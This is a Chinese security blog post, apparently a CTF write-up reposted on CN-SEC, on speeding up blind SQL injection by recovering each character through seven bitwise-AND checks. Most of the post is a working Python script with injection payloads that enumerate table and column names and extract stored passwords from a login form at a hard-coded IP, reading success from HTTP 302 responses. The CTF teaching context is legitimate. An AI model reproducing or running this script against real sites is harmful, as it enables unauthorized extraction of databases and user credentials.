sql盲注效率之与运算

admin 2022年1月6日01:39:22安全博客 CTF专场评论8 views2161字阅读7分12秒阅读模式

以往大部分 sql 盲注的爆破脚本大概都是通过遍历一串可打印字符来对比,猜解正确的字符值。昨天看到了一种通过与运算来猜解字符串的想法,每个字符值只要通过7次与运算,就能够确定,有点类似于二分法,对比单纯遍历的思想,效率显著提升。

详情可看此文章:
让你的SQL盲注快起来

与运算猜解脚本如下:

1
2
3
4
5
6
7
8
9
10
11
def compute_by_and(word):
for ele in word:
ele_b=get_character(ele)
print "Guess the value {}:{}".format(ele_b,chr(ele_b))
def get_character(char):
char_b=ord(char)
value=0
for i in range(7):
if char_b & (2**i):
value=value+(2**i)
return value

来一道ctf题练练手

链接:
http://111.230.11.183:44444/basic_skills/sql/sql3.php
python sql盲注脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#coding:utf-8
import requests
import urllib
url="http://111.230.11.183:44444/basic_skills/sql/sql3.php"
table_payload="a' or 1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1))&{2} -- "
column_payload="a' or 1 and ascii(substr((select column_name from information_schema.columns where table_name='user' limit {0},1),{1},1))&{2} -- +"
flag_payload= "a' or 1 and ascii(substr((select password from user limit {0},1),{1},1))&{2} -- "
#pyaload中mysql注释符--,后面记得要有空格

headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": "http://111.230.11.183:44444",
"Connection": "close",
"Referer": "http://111.230.11.183:44444/basic_skills/sql/sql3.php",
"Upgrade-Insecure-Requests": "1"
}

def get_information():
all_name="result:"# 所有
for i in range(15):
name=""#单一
for j in range(1,33):
value=0#ascii
for k in range(7):
#payload=table_payload.format(i,j,(2**k))
#payload=column_payload.format(i,j,(2**k))
payload=flag_payload.format(i,j,(2**k))
#payload=urllib.quote(payload)
#print payload
data={
"username": payload,
"password":"sdf"
}
rep=requests.post(url=url,headers=headers,data=data,allow_redirects=False)
if rep.status_code==302:
value=value+(2**k)
if value==0: #判断name的结尾
if name=="":
print all_name
return 1
all_name=all_name+" "+name
break
name=name+chr(value)
print name

if __name__=="__main__":
get_information()

参考文章:

让你的SQL盲注快起来

FROM :blog.cfyqy.com | Author:cfyqy

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日01:39:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  sql盲注效率之与运算 http://cn-sec.com/archives/722139.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: